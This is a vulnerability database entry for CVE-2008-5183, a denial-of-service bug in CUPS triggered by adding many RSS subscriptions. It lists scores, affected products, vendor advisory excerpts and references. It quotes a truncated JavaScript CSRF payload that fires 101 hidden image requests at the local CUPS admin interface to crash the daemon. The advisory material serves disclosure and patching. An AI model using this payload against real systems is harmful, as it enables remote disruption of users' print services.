Published: 21/11/2008 Updated: 28/12/2023

CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 435

Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

cupsd in CUPS 1.3.9 and previous versions allows local users, and possibly remote attackers, to cause a denial of service (daemon crash) by adding a large number of RSS Subscriptions, which triggers a NULL pointer dereference. NOTE: this issue can be triggered remotely by leveraging CVE-2008-5184.

Vulnerable Product	Search on Vulmon	Subscribe to Product
apple cups
apple mac os x
apple mac os x server
opensuse opensuse 11.0
debian debian linux 5.0
debian debian linux 6.0

Synopsis Moderate: cups security update Type/Severity Security Advisory: Moderate Topic Updated cups packages that fix a security issue are now available for RedHat Enterprise Linux 5This update has been rated as having moderate security impact by the RedHat Security Response Team Description ...

Debian Bug report logs - #506180 CVE-2008-5183: daemon crashes when adding more than 100 subscriptions Package: cups; Maintainer for cups is Debian Printing Team <debian-printing@listsdebianorg>; Source for cups is src:cups (PTS, buildd, popcon) Reported by: Raphael Geissert <atomo64@gmailcom> Date: Wed, 19 Nov 20 ...

It was discovered that CUPS didn’t properly handle adding a large number of RSS subscriptions A local user could exploit this and cause CUPS to crash, leading to a denial of service This issue only applied to Ubuntu 710, 804 LTS and 810 (CVE-2008-5183) ...

Several vulnerabilities have been discovered in the Common UNIX Printing System: CVE-2008-5183 A null pointer dereference in RSS job completion notifications could lead to denial of service CVE-2009-3553 It was discovered that incorrect file descriptor handling could lead to denial of service CVE-2010-0540 A cross-site request for ...

<script> // make 101 CSRFed requests to CUPS daemon via 'img' tags // causes CUPS daemon to crash // by Adrian 'pagvac' Pastor | GNUCITIZENorg for(var i=1;i<=101;++i) { documentwrite("<img width=0 height=0 " + "src=\"localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION ...

CWE-476 http://www.openwall.com/lists/oss-security/2008/11/19/4 http://www.openwall.com/lists/oss-security/2008/11/19/3 http://www.gnucitizen.org/blog/pwning-ubuntu-via-cups/https://bugs.launchpad.net/ubuntu/+source/cups/+bug/298241 http://www.openwall.com/lists/oss-security/2008/11/20/1 http://www.securityfocus.com/bid/32419 http://lists.opensuse.org/opensuse-security-announce/2008-11/msg00002.html http://lab.gnucitizen.org/projects/cups-0day http://www.redhat.com/support/errata/RHSA-2008-1029.html http://www.mandriva.com/security/advisories?name=MDVSA-2009:028 http://www.securitytracker.com/id?1021396 http://lists.apple.com/archives/security-announce/2009/Feb/msg00000.html http://secunia.com/advisories/33937 http://support.apple.com/kb/HT3438 http://www.vupen.com/english/advisories/2009/0422 http://www.vupen.com/english/advisories/2011/0535 http://secunia.com/advisories/43521 http://www.debian.org/security/2011/dsa-2176 https://exchange.xforce.ibmcloud.com/vulnerabilities/46684 https://www.exploit-db.com/exploits/7150 https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10586 https://access.redhat.com/errata/RHSA-2008:1029 https://usn.ubuntu.com/707-1/https://nvd.nist.gov https://www.exploit-db.com/exploits/7150/

CVE-2008-5183

Vulnerability Summary

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect